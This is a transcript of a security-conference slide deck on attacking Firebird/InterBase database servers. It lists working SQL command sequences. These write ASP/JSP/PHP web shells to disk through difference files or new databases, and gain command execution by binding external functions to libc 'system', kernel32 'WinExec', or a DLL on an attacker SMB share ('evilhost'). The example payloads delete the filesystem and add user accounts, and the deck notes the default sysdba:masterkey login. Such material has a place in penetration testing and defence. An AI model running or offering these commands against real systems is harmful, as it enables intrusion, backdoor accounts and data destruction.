Firebird Interbase Database engine hacks or rtfm
-
Upload
qqlan -
Category
Technology
-
view
14.416 -
download
8
description
Transcript of Firebird Interbase Database engine hacks or rtfm
Firebird/interbase database engine hacks or RTFM
Osipov Alexey@GiftsUngiven
/whoami
• Osipov Alexey• Web-hacker, pentester, member of
SCADAStrangeLove• PHDays, BlackHat, NoSuchCon speaker• Developer of different pentesting PoC’s
– XML– MySQL
Twitter: @GiftsUngiven
Why so serious?
• “Pseudo” Market shares– mysql, MSSQL, Oracle, postgresql, …
• 99%– Firebird
• 1%
• That means– mysql, MSSQL, Oracle, postgresql, …
• N ways to own them– Firebird
• None ways to own it
–
Pentesting
• Requirements– SQLi
• https://forum.antichat.ru/• https://rdot.org
– Account• Which is sysdba:masterkey most of the time
• No ways to escape it– RW filesystem– Execute– So..
File creation (part 1)
• Create difference file– CONNECT '<host>:<existent database>';– ALTER DATABASE ADD DIFFERENCE FILE 'filename';– ALTER DATABASE BEGIN BACKUP;– INSERT INTO TABLE `exploited` VALUES
(‘<ASP/JSP/PHP shell>’);– COMMIT;
• Your file is locked, so – EXIT;
File creation (part 2)
• Database creation– CREATE DATABASE '<host>:<abritrary
non-existent path>';– CREATE TABLE a ('value' BLOB);– INSERT INTO a VALUES ('<ASP/JSP/PHP shell>');– COMMIT;
• Again, your file is locked– EXIT
RCE (part 1)
• Main problem if configuration (but sometimes enabled):
••• *nix (like in PostgreSQL)
– DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'system' MODULE_NAME '/lib/libc.so';
– SELECT FIRST 1 exec('rm /* -rf') FROM any_table LIMIT 1;
RCE (part 2)
• Windows– DECLARE EXTERNAL FUNCTION exec
cstring(4096), integer RETURNS integer BY VALUE ENTRY_POINT 'WinExec' MODULE_NAME 'c:\windows\system32\kernel32.dll';
– SELECT FIRST 1 exec('net user /add ****', 1) FROM any_table LIMIT 1;
• Kudos to Alexander Tlyapov (@Rigros1)•
•
RCE (part 3)
• Windows– DECLARE EXTERNAL FUNCTION exec cstring(4096)
RETURNS cstring(4096) ENTRY_POINT 'Exec' MODULE_NAME '\\evilhost\share\udf.dll';
– SELECT FIRST 1 exec('net user /add ****') FROM any_table LIMIT 1;
• No NTLM auth on host, so SAMBA with anonymous login only
• Can create any needed function
Questions?
@GiftsUngiven